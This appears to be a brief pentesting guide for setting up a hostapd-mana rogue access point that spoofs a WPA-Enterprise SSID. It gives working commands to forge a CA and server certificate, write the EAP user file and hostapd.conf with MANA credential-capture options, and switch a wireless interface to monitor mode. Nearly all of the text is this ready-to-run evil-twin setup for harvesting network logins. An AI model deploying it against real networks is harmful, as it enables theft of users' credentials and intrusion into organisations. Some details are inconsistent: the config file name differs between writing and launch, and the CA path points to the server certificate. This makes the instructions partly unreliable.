hostapd-mana
hostapd-mana is great for pentesting WPA enterprise networks.
Create a working directory
Create a working directory and navigate to it:
mkdir -p ~/mana/certs
cd ~/mana/certs
Generate certificates and keys
Generate CA private key and certificate
openssl genrsa -out ca.key 2048
openssl req -x509 -new -nodes -key ca.key -sha256 -days 3650 -out ca.pem \
-subj "/C=US/ST=SomeState/L=SomeCity/O=SomeOrgName/OU=SomeDepartment/CN=ACME CO Name Root CA"
Generate server private key and certificate
openssl genrsa -out server.key 2048
openssl req -new -key server.key -out server.csr \
-subj "/C=US/ST=SomeCity/L=SomeState/O=SomeOrgName/OU=IT Department/CN=toteslegitwifi.companyname.com"
Sign the server certificate with our CA
openssl x509 -req -in server.csr -CA ca.pem -CAkey ca.key -CAcreateserial -out server.pem -days 365 -sha256
Generate DH parameters
openssl dhparam -out dhparam.pem 2048
Create EAP user file
Create the EAP user configuration file:
echo '* PEAP,TTLS,TLS,MD5,GTC' > hostapd.eap_user
echo '"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]' >> hostapd.eap_user
Configure hostapd.conf
This needs to be tuned for your specific environment:
interface=NAME-OF-YOUR-WIFI-INTERFACE
ssid=SSID-TO-SPOOF
channel=6
hw_mode=g
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP
auth_algs=3
# 802.1x configuration
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
# Certificate configuration
ca_cert=server.pem
server_cert=server.pem
private_key=server.key
private_key_passwd=
dh_file=dhparam.pem
# MANA specific settings
enable_mana=1
mana_wpe=1
mana_eapsuccess=1
Kill any interfering processes
sudo airmon-ng check kill
# Configure interface
sudo ip link set wlx9cefd5faf852 down
sudo iw dev wlx9cefd5faf852 set type monitor
sudo ip link set wlx9cefd5faf852 up
# Stop NetworkManager (optional but recommended)
sudo systemctl stop NetworkManager
Run hostapd-mana
sudo hostapd hostfile.conf
Run with a log file
sudo hostapd/hostapd host.conf | tee -a log.log